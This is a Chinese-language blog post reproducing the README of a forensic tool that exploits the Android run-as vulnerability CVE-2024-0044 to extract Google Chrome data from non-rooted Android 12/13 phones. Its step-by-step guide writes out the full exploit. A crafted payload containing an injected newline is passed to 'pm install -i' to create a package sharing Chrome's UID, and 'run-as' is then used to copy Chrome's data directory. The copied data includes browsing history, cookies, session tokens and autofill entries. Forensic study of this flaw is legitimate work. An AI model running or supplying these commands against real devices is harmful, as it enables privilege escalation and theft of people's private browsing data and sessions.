利用 CVE-2024-0044 漏洞进行 Chrome 安卓取证分析

本文介绍了一款利用 CVE-2024-0044 (Run-as) 漏洞的数字取证工具,用于在非 Root 的 Android 12/13 设备上提取和分析 Google Chrome 数据,包括浏览历史、下载、Cookie 等,并生成详细的 Excel 报告。

🔍 Chrome Forensic - CVE-2024-0044

一个强大的数字取证工具,用于从 Android 设备提取和分析 Google Chrome 数据。

📋 概述

该工具利用 CVE-2024-0044 (Run-as) 漏洞,绕过非 Root Android 12/13 设备上的权限限制,实现对 Google Chrome 数据的取证提取。该工具解析原始 SQLite 数据库并生成全面的分析报告。

🔄 流程概述

从数据采集到报告生成的完整取证分析工作流程。

📊 功能与输出

该工具生成一个全面的 Excel 报告 (result_chrome_forensic.xlsx),包含以下工作表:

工作表名称 描述
📖 Browsing History 访问过的 URL 的详细时间线
📈 Analytics – Top Sites 访问最多域名的统计排名
⚠️ ALERTS – Suspicious 自动标记的 URL(黑客、毒品、成人内容)
📥 Downloads 下载历史记录(包含路径和文件大小)
🔍 Search Terms 来自多功能框/谷歌的用户搜索查询
🍪 Cookies & Sessions 会话令牌和 Cookie 元数据(十六进制加密)
✍️ Autofill Data 已保存的表单数据(姓名、地址等)

🛠️ 前提条件

硬件要求

  • 📱 Android 手机 (Android 12/13)
  • 💻 个人电脑 (Linux/Windows/Mac)

测试环境

  • 🐧 操作系统: Linux UOS 20 Professional

软件要求

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 Dummy APK 文件 (例如, F-Droid.apk)

🚀 安装

  1. 克隆仓库

    1
    2
    
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. 安装依赖

    1
    
    pip install -r requirements.txt
    

🔓 数据获取指南

第 1 步:准备设备

  1. 进入 设置关于手机
  2. 点击 版本号 7 次以启用 开发者选项
  3. 进入 设置系统开发者选项
  4. 启用 USB调试
  5. 通过 USB 将手机连接到电脑并授权连接

第 2 步:准备漏洞利用文件

将 Dummy APK 推送到临时文件夹

1
adb push F-Droid.apk /data/local/tmp/base.apk

第 3 步:查找目标 UID

1
2
3
adb shell pm list packages -U | grep com.android.chrome
# 输出示例: package:com.android.chrome uid:10129
# 记录 UID (例如 10129)

第 4 步:执行漏洞利用

⚠️ 将 10129 替换为你在第 3 步中获得的实际 Chrome UID

1
2
3
4
5
6
7
8
adb shell

# 在 ADB Shell 内:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# 触发包管理器
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

第 5 步:提取数据

仍在 ADB Shell 内执行:

1
2
3
4
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# 退出 ADB Shell
exit

第 6 步:将数据拉取到电脑

1
adb pull /data/local/tmp/chrome.tar .

第 7 步:解压数据

chrome.tar 文件解压到项目文件夹。无需手动移动文件。Python 脚本会自动在解压的文件夹内找到数据库文件。

1
tar -xf chrome.tar

💻 使用

运行取证分析工具:

1
python3 chrome_forensic.py

该工具将分析数据库文件并在同一目录下生成 result_chrome_forensic.xlsx

⚖️ 法律免责声明

⚠️ 重要说明:此工具仅用于教育目的和授权的取证分析。

  • 仅用于您拥有或已获得明确书面许可进行分析的设备。
  • 未经授权访问数字设备可能违反您所在辖区的法律。
  • 作者对此工具的滥用不承担任何责任。

🤝 贡献

欢迎贡献!请随时提交拉取请求。

📄 许可证

本项目根据 GNU 通用公共许可证 v3.0 授权。详见 LICENSE 文件。

👤 致谢

数据获取方法的原理验证概述由 Tinyhack.com 分享。


Made with ❤️ by JackTekno ⭐ Star this repo • 🐛 Report Bug • 💡 Request Feature

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计